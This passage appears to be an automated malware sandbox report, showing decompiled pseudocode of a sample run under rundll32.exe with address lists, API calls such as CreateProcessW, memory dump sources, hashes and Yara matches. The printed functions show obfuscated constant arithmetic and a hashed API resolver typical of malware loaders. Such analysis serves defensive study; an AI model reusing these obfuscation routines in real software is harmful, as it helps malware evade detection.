												if(_t99 != 0) {
													continue;
												} else {
													goto L29;
												}
											}
										}
										L31:
										if(_t83 == 0) {
											goto L33;
										} else {
											_t80 = 0;
										}
										goto L42;
									}
									asm("sbb eax, eax");
									_t83 = _t82 | 0x00000001;
									goto L31;
								}
							} else {
								goto L41;
							}
						}
					}
					L42:
					return _t80;
				}
			}















































                          0x6f24d3e0
                          0x6f24d3e0
                          0x6f24d3e7
                          0x6f24d3f0
                          0x6f24d50f
                          0x6f24d3f6
                          0x6f24d3f6
                          0x6f24d3f7
                          0x6f24d3f8
                          0x6f24d402
                          0x6f24d405
                          0x6f24d40b
                          0x6f24d415
                          0x6f24d43a
                          0x6f24d43f
                          0x6f24d444
                          0x6f24d50b
                          0x00000000
                          0x6f24d50c
                          0x6f24d444
                          0x6f24d415
                          0x6f24d44a
                          0x6f24d44d
                          0x6f24d450
                          0x6f24d456
                          0x6f24d45c
                          0x6f24d46e
                          0x6f24d473
                          0x6f24d476
                          0x6f24d479
                          0x6f24d47c
                          0x6f24d47f
                          0x6f24d485
                          0x6f24d48b
                          0x6f24d48e
                          0x6f24d491
                          0x6f24d4a0
                          0x6f24d4a1
                          0x6f24d4a1
                          0x6f24d4a6
                          0x6f24d4b9
                          0x6f24d4bb
                          0x6f24d4c0
                          0x6f24d4cb
                          0x6f24d4cd
                          0x6f24d4cf
                          0x6f24d4eb
                          0x6f24d4f0
                          0x6f24d4f3
                          0x6f24d4f3
                          0x6f24d4cb
                          0x6f24d4c0
                          0x6f24d4f9
                          0x6f24d4fa
                          0x6f24d4fd
                          0x6f24d500
                          0x6f24d503
                          0x6f24d506
                          0x6f24d491
                          0x00000000
                          0x6f24d485
                          0x6f24d510
                          0x6f24d515
                          0x6f24d519
                          0x6f24d51c
                          0x6f24d51d
                          0x6f24d51e
                          0x6f24d51f
                          0x6f24d524
                          0x6f24d59c
                          0x6f24d59e
                          0x6f24d526
                          0x6f24d526
                          0x6f24d52c
                          0x00000000
                          0x6f24d52e
                          0x6f24d531
                          0x6f24d534
                          0x6f24d53b
                          0x6f24d53e
                          0x6f24d542
                          0x6f24d574
                          0x6f24d577
                          0x6f24d57e
                          0x6f24d584
                          0x6f24d58e
                          0x6f24d597
                          0x6f24d597
                          0x6f24d58e
                          0x6f24d584
                          0x6f24d598
                          0x6f24d544
                          0x6f24d544
                          0x6f24d544
                          0x6f24d547
                          0x6f24d547
                          0x6f24d54b
                          0x00000000
                          0x00000000
                          0x6f24d54f
                          0x6f24d563
                          0x6f24d563
                          0x6f24d551
                          0x6f24d551
                          0x6f24d557
                          0x00000000
                          0x6f24d559
                          0x6f24d559
                          0x6f24d55c
                          0x6f24d561
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6f24d561
                          0x6f24d557
                          0x6f24d56c
                          0x6f24d56e
                          0x00000000
                          0x6f24d570
                          0x6f24d570
                          0x6f24d570
                          0x00000000
                          0x6f24d56e
                          0x6f24d567
                          0x6f24d569
                          0x00000000
                          0x6f24d569
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6f24d534
                          0x6f24d52c
                          0x6f24d59f
                          0x6f24d5a3
                          0x6f24d5a3

                          APIs
                          • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 6F24D405
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.641042475.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000004.00000002.641004987.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641140882.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641221834.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641232429.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641246076.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: EncodePointer
                          • String ID: MOC$RCC
                          • API String ID: 2118026453-2084237596
                          • Opcode ID: f792fab43d80bc1de8219a737c13769799f524bf5d059ebe3973e900094fa151
                          • Instruction ID: 39b73f3fe8fc4c5312a3b6d970b89b72cfac6e5c51787718299818faa347f2a6
                          • Opcode Fuzzy Hash: f792fab43d80bc1de8219a737c13769799f524bf5d059ebe3973e900094fa151
                          • Instruction Fuzzy Hash: 15417B7190020EAFCF0ACF98C980ADE7BB6BF48305F548099F915672A0D3B5A961DF51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Analysis Process: rundll32.exe PID: 6612 Parent PID: 6544 rundll32.exeCOMMON

                          Executed Functions

                          Function 00B9505F, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E00B9505F() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t29;

				_v12 = 0xab28db;
				_v12 = _v12 * 0xb;
				_v12 = _v12 | 0x438b2011;
				_v12 = _v12 ^ 0x47dfe9f9;
				_v8 = 0x2279c5;
				_v8 = _v8 * 0x7e;
				_v8 = _v8 << 5;
				_v8 = _v8 ^ 0x1ef6af05;
				_v16 = 0x91523b;
				_v16 = _v16 ^ 0x417bd16a;
				_v16 = _v16 ^ 0x41eb784b;
				E00BA0A93(0x9aad6eb1, 0x12d, _t29, _t29, 0x97da6f6d);
				ExitProcess(0);
			}







                          0x00b95065
                          0x00b9507c
                          0x00b95084
                          0x00b9508b
                          0x00b95092
                          0x00b9509d
                          0x00b950a0
                          0x00b950a4
                          0x00b950ab
                          0x00b950b2
                          0x00b950b9
                          0x00b950c9
                          0x00b950d3

                          APIs
                          • ExitProcess.KERNEL32(00000000), ref: 00B950D3
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.634790004.0000000000B90000.00000040.00000010.sdmp, Offset: 00B90000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: ExitProcess
                          • String ID: KxA
                          • API String ID: 621844428-223459762
                          • Opcode ID: 72bf4aae16cd11734e86aa57fe45557da35340bda08c7e5569cc87c1b667450f
                          • Instruction ID: 99d2af34f1a644b37f66eb350c33f0c1cdd38625e63c14bf60e2e14002cecd6c
                          • Opcode Fuzzy Hash: 72bf4aae16cd11734e86aa57fe45557da35340bda08c7e5569cc87c1b667450f
                          • Instruction Fuzzy Hash: DA01F270D05208FBCB48DFE9D94698DFFB4EB40304F218199E511A72A0D7702B949B05
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B92C3A, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 38stringCOMMON
                          Download Yara Rule
                          C-Code - Quality: 67%
                          			E00B92C3A(void* __ecx, WCHAR* __edx, intOrPtr _a4, WCHAR* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t23;
				int _t29;
				WCHAR* _t33;

				_push(_a12);
				_t33 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00B9358A(_t23);
				_v16 = 0x4d9c80;
				_v16 = _v16 | 0xcc7fbb6c;
				_v16 = _v16 ^ 0xcc74081e;
				_v12 = 0xfa0b63;
				_v12 = _v12 | 0xd4c459ea;
				_v12 = _v12 ^ 0xd4f66af0;
				_v8 = 0x175dc5;
				_v8 = _v8 | 0x605a8863;
				_v8 = _v8 ^ 0x60557826;
				E00BA0A93(0xaea26b2f, 0x23c, __ecx, __ecx, 0x97da6f6d);
				_t29 = lstrcmpiW(_t33, _a8); // executed
				return _t29;
			}









                          0x00b92c41
                          0x00b92c44
                          0x00b92c46
                          0x00b92c49
                          0x00b92c4c
                          0x00b92c4d
                          0x00b92c4e
                          0x00b92c53
                          0x00b92c5d
                          0x00b92c64
                          0x00b92c6b
                          0x00b92c72
                          0x00b92c79
                          0x00b92c80
                          0x00b92c87
                          0x00b92c8e
                          0x00b92caf
                          0x00b92cbb
                          0x00b92cc1

                          APIs
                          • lstrcmpiW.KERNELBASE(?,CC74081E,?,?,?,?,?,?,?,?,00000000), ref: 00B92CBB
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.634790004.0000000000B90000.00000040.00000010.sdmp, Offset: 00B90000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: lstrcmpi
                          • String ID: &xU`
                          • API String ID: 1586166983-1954668127
                          • Opcode ID: 33fbf76182eafc49d529afff0049f42f4ee3fc7ed41e886679a16bb7a8d61cf5
                          • Instruction ID: e793ee5cb72dd9dce5657993e2e8227feae0a1ed8d7b183fe97211be03be3b86
                          • Opcode Fuzzy Hash: 33fbf76182eafc49d529afff0049f42f4ee3fc7ed41e886679a16bb7a8d61cf5
                          • Instruction Fuzzy Hash: 33011675D11248BBDB04EFD5D94A99EBFB4EF04310F00C098E81966221D7719B109B96
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B9F66B, Relevance: 1.6, APIs: 1, Instructions: 74processCOMMON
                          Download Yara Rule
                          C-Code - Quality: 39%
                          			E00B9F66B(WCHAR* __ecx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, struct _STARTUPINFOW* _a40, struct _PROCESS_INFORMATION* _a44, intOrPtr _a48, int _a56, WCHAR* _a60) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t46;
				int _t57;
				signed int _t59;
				signed int _t60;
				WCHAR* _t67;

				_push(_a60);
				_t67 = __ecx;
				_push(_a56);
				_push(0);
				_push(_a48);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(0);
				_push(_a4);
				_push(0);
				_push(__ecx);
				E00B9358A(_t46);
				_v12 = 0xe19ae5;
				_v12 = _v12 + 0xe09a;
				_t59 = 0x16;
				_v12 = _v12 * 0x55;
				_v12 = _v12 ^ 0x4b33a1b3;
				_v8 = 0x3d4fbd;
				_v8 = _v8 ^ 0xea855bbf;
				_t60 = 0x67;
				_v8 = _v8 / _t59;
				_v8 = _v8 ^ 0x0aa3a294;
				_v16 = 0x5e6fbc;
				_v16 = _v16 / _t60;
				_v16 = _v16 ^ 0x00005386;
				E00BA0A93(0xae3271c4, 0x240, _t60, _t60, 0x97da6f6d);
				_t57 = CreateProcessW(_t67, _a60, 0, 0, _a56, 0, 0, 0, _a40, _a44); // executed
				return _t57;
			}











                          0x00b9f673
                          0x00b9f678
                          0x00b9f67a
                          0x00b9f67d
                          0x00b9f67e
                          0x00b9f681
                          0x00b9f684
                          0x00b9f687
                          0x00b9f688
                          0x00b9f689
                          0x00b9f68c
                          0x00b9f68f
                          0x00b9f692
                          0x00b9f695
                          0x00b9f698
                          0x00b9f699
                          0x00b9f69c
                          0x00b9f69d
                          0x00b9f69e
                          0x00b9f6a3
                          0x00b9f6ad
                          0x00b9f6bc
                          0x00b9f6bf
                          0x00b9f6c2
                          0x00b9f6c9
                          0x00b9f6d0
                          0x00b9f6dc
                          0x00b9f6dd
                          0x00b9f6e2
                          0x00b9f6e9
                          0x00b9f6fa
                          0x00b9f6fd
                          0x00b9f719
                          0x00b9f733
                          0x00b9f73a

                          APIs
                          • CreateProcessW.KERNELBASE(2D09D167,?,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 00B9F733
                          Memory Dump Source
                          • Source File: 00000007.00000002.634790004.0000000000B90000.00000040.00000010.sdmp, Offset: 00B90000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: CreateProcess
                          • String ID:
                          • API String ID: 963392458-0
                          • Opcode ID: 23bdea19f37545656c8519616df4547577199db0088a864ae2cd4e3c52a4600c
                          • Instruction ID: 9a21cdb74bbe60b8c0f0024b2e06f6994aae5cff31d361293bcdd4ebbbc62293
                          • Opcode Fuzzy Hash: 23bdea19f37545656c8519616df4547577199db0088a864ae2cd4e3c52a4600c
                          • Instruction Fuzzy Hash: A6210A32900148FBDF15DF95CC0ACDFBFBAEB89700F008089FA1466250D7B69A60DB51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Non-executed Functions